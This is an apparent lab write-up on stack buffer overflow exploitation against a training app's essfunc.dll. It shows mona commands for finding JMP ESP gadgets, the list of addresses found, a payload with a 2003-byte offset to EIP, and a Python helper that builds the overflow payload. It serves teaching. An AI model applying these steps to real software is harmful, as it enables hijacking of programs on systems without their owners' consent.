Run mona in the debugger, attached to the app/client we're running, to list loaded modules and find one with all protections set to False:
!mona modules
In this case it was essfunc.dll.
We can use nasm_shell to get the opcode bytes for the instruction we want:
locate nasm_shell
#output:
/usr/bin/msf-nasm_shell
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
and ask it what JMP ESP looks like in hex:
JMP ESP
#output:
FFE4
Then find those bytes in the debugger using mona, restricting the search to essfunc.dll (the DLL we identified earlier as having all protections = False):
!mona find -s "\xff\xe4" -m essfunc.dll
Mona lists every address in that module where FF E4 occurs:
625011af
625011bb
625011c7
625011d3
625011df
625011eb
625011f7
62501203
62501205
When using one of these addresses in the exploit, the bytes are written in reverse order, because x86 is little-endian: 0x625011af becomes \xaf\x11\x50\x62.
shellcode = "A" * 2003 + "\xaf\x11\x50\x62"  # 2003 bytes to reach EIP, then the JMP ESP address 0x625011af in little-endian
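The steps above (search a module for FF E4, convert the hit to little-endian, place it at the EIP offset) as a small Python helper. This is an added example, not code from the original notes: it packs the address with struct instead of typing the bytes by hand, so the order cannot be mis-keyed, and it refuses a return address that contains a bad character. The module bytes, the 0x62500000 base and the 0x00 bad character are constructed assumptions for the demo; in practice the bytes come from the debugger and the bad characters from the target.

```python
import struct

# Opcode bytes for JMP ESP, as reported by msf-nasm_shell (FFE4).
JMP_ESP = b"\xff\xe4"


def find_gadget(module_bytes: bytes, base: int, pattern: bytes = JMP_ESP) -> list:
    """Return every virtual address where pattern occurs in module_bytes.

    This mirrors what `!mona find -s "\\xff\\xe4" -m <module>` does: scan the
    module's bytes and report base + offset for each hit.
    """
    hits = []
    start = 0
    while True:
        i = module_bytes.find(pattern, start)
        if i == -1:
            return hits
        hits.append(base + i)
        start = i + 1  # keep scanning for overlapping/later hits


def pack_addr(addr: int) -> bytes:
    """Pack a 32-bit address little-endian, e.g. 0x625011af -> b'\\xaf\\x11\\x50\\x62'."""
    return struct.pack("<I", addr)


def has_badchars(data: bytes, badchars: bytes = b"\x00") -> bool:
    """True if any byte of data is in the bad-character set."""
    return any(b in data for b in badchars)


def build_payload(offset: int, ret_addr: int, badchars: bytes = b"\x00") -> bytes:
    """Filler up to the saved EIP, then the return address in little-endian.

    Raises if the packed address contains a bad character, since a single
    bad byte would truncate or mangle the buffer before it reaches EIP.
    """
    ret = pack_addr(ret_addr)
    if has_badchars(ret, badchars):
        raise ValueError(f"return address {ret_addr:#x} contains a bad character")
    return b"A" * offset + ret


# Constructed stand-in for a module image (NOT a real dump of essfunc.dll):
# two JMP ESP gadgets placed so they land at 0x625011af and 0x625011bb,
# the first two offsets mona reported in the notes above. Assumed base 0x62500000.
MODULE_BASE = 0x62500000
FAKE_MODULE = b"\x90" * 0x11AF + JMP_ESP + b"\x90" * 10 + JMP_ESP


def demo() -> bytes:
    """Pick the first clean JMP ESP and build the 2003-byte-offset payload."""
    candidates = find_gadget(FAKE_MODULE, MODULE_BASE)
    for addr in candidates:
        if not has_badchars(pack_addr(addr)):
            return build_payload(2003, addr)
    raise RuntimeError("no usable JMP ESP address found")


if __name__ == "__main__":
    for a in find_gadget(FAKE_MODULE, MODULE_BASE):
        print(f"JMP ESP at {a:#010x} -> {pack_addr(a).hex()}")
    payload = demo()
    print(len(payload), payload[-4:].hex())
```

`pack_addr` is the piece worth keeping in any exploit script: `struct.pack("<I", 0x625011af)` always yields `\xaf\x11\x50\x62`, whereas hand-reversing hex pairs is where typos creep in. The bad-character check also catches addresses such as 0x62500011, whose packed form contains a 0x00.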